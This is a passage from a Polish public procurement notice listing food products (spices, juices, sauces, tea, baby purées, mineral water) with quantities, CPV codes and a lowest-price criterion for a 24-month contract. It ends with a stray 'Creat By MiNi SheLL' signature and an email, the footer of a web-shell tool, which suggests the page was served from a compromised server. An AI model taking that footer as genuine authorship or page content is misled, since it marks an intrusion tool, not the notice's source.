55.	Papryka konserwowa wielkość opakowania jednostkowego max-1L	kg	700

56.	Papryka sucha (ostra, słodka)wielkość opakowania jednostkowego max-20g	kg	20

57.	Koncentrat  pomidorowy 30% wielkość opakowania jednostkowego max-200g	kg	1300

58.	Pieprz naturalny mielony
Wielkość opakowania jednostkowego max-20g	kg	1200

59.	Proszek do pieczenia wielkość opakowania jednostkowego max-40g	kg	4

60.	Przyprawa do kurczaka
mielona wielkość opakowania jednostkowego max-40g	kg	10


61.	Płatki jęczmienne błyskawiczne wielkość opakowania jednostkowego max-1kg	kg	3000

62.	Ryż biały długoziarnisty wielkość opakowania jednostkowego max-1kg	kg	5500

63.	Sok marchwiowo - owocowy (jabłko, banan, 
morela)
bez zawartości cukru wielkość opakowania jednostkowego 175ml rodzaj opakowania -butelka szklana	szt	13500




64.	Syrop owocowy różne smaki wielkość opakowania jednostkowego max 500ml rodzaj opakowania-butelka szklana	kg	3500


65.	Sól jodowana wielkość opakowania jednostkowego max-1kg	kg	4000

66.	Seler konserwowy wiórki, wielkość opakowania jednostkowego max-350g	kg	80

67.	Sok owocowy
karton -różne smaki wielkość opakowania jednostkowego 0,2L rodzaj opakowania kartonik	szt.	350


68.	Sos słodko kwaśny
Wielkość opakowania jednostkowego max-600g	kg	100

69.	Sos sałatkowy różne smaki (grecki - winegrett,
koperkowo- ziołowy)
wielkość opakowania jednostkowego max-10g	kg	1


70.	Sos czekoladowy wielkość opakowania jednostkowego max-200g rodzaj opakowania butelka plastikowa	kg	5
71.	Sos sojowy ciemny wielkość opakowania jednostkowego max-250g rodzaj opakowania butelka szklana	kg	3
72.	Szczaw zielony konserwowy wielkość opakowania jednostkowego max-300g	kg	150
73.	Przyprawa warzywna w proszku lub granulkach wielkość opakowania max-100g	kg	600

74.	Ziele angielskie wielkość opakowania jednostkowego max-20g	kg	40

75.	Żelatyna spożywcza wielkość opakowania jednostkowego max-60g	kg	25

76.
	Brzoskwinie w syropie
wielkość opakowania jednostkowego max-600g	kg	60

77.	Śmietanka w sprayu wielkość opakowania jednostkowego  250g	szt.	100
78.
	Śmietanka  do kawy płynna wielkość opakowania jednostkowego 10g rodzaj opakowania plastik	szt.	4000
79.
	Oregano mielone wielkość opakowania jednostkowego max-20g	kg	2
80.
	Zioła prowansalskie wielkość opakowania jednostkowego max-20g	kg	2
81.
	Kawa zbożowa rozpuszczalna wielkość opakowania jednostkowego max-200g	kg	120
82.	Kakao naturalne wielkość opakowania jednostkowego max-100g	kg	12
83.
	Wafelki różne smaki
wielkość opakowania max-100g	kg	80

84.	Drożdże spożywcze
Wielkość opakowania jednostkowego max-100g	kg	5

85.	Przyprawa Gyros
Wielkość opakowania jednostkowego max-40g	kg	2

86.	Barszcz biały w płynie wielkość opakowania jednostkowego max-500g	kg	100
87.	Herbata ekspresowa, (czarna),  torebki, w opakowaniu 100 sztuk torebek 	Opakowanie 100sztuk torebek 	3600 Opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.12.00-4, 15.87.12.73-8, 15.33.00.00-0, 15.60.00.00-4, 15.86.00.00-4, 15.87.12.73-8, 15.89.10.00-8, 15.89.80.00-9, 15.41.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty spożywcze dla niemowlaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	Nazwa produktu	Orientacyjna ilość kg sztuk/opakowań w okresie 2 lat
1.	Jabłuszko (przecier) po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	468 kg
2.	Jabłko+ marchewka po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	180 kg
3.	Marchewka po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	108 kg
4.	Zupka jarzynowa z warzywami + ryż po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	126 kg
5.	Jabłko + banan lub brzoskwinia, jagoda po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	720 kg
6.	Kaszka do picia mleczno-ryżowa lub mleczno -kukurydziana po 4 miesiącu życia, 250ml, termin przydatności do spożycia nie mniej niż 6 miesięcy	900 kg
7.	Kaszka mleczna po 12 miesiącu życia, 250ml, termin przydatności do spożycia nie mniej niż 6 miesięcy	300 kg
8.	Marchewka z ryżem po 4 miesiącu życia, 125-150g, termin przydatności do nie mniej niż 6 miesięcy 	180 kg
9.	Jarzynowa z kurczakiem lub indykiem, królikiem, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	792 kg
10.	Ryż z mięsem + warzywa po 12 miesiącu życia, 180-200g, termin przydatności do spożycia nie mniej niż 6 miesięcy	192 kg
11.	Mleko w proszku z kleikiem ryżowym po 6 miesiącu życia, 350g, termin przydatności do spożycia nie mniej niż 6 miesięcy	100,8 kg
12.	Herbatka granulat od 1 miesiąca życia koper włoski, rumianek, ułatwiająca trawienie,
Uspakajająca, 200g, termin przydatności do spożycia nie mniej niż 6 miesięcy	96 kg
13.	Kleik ryżowy po 4 miesiącu życia,
150-180g, termin przydatności do spożycia  nie mniej niż 6 miesięcy	43,2 kg
14.	Woda mineralna nie gazowana niskozmineralizowana 
o zawartości minerałów <500mg/l,
szczegółowo:
Ca  -      42-56 mg/l
Na  -      do 10,2 mg/l
Mg  -      5-35 mg/l
K -         do 30 mg/l
HCO3 - do 300 mg/l
Cl -        3,5-5,5 mg/l, 
butelka 0,5 litra
termin przydatności do spożycia nie mniej niż 6 miesięcy	9600 sztuk
15. 	Herbata ekspresowa,
(czarna) torebki  ok.2 gram  ze sznurkiem, pakowana po 100 torebek.
Termin przydatności do spożycia nie mniej niż 6 miesięcy	48 opakowań po 100 szt. torebek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8, 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com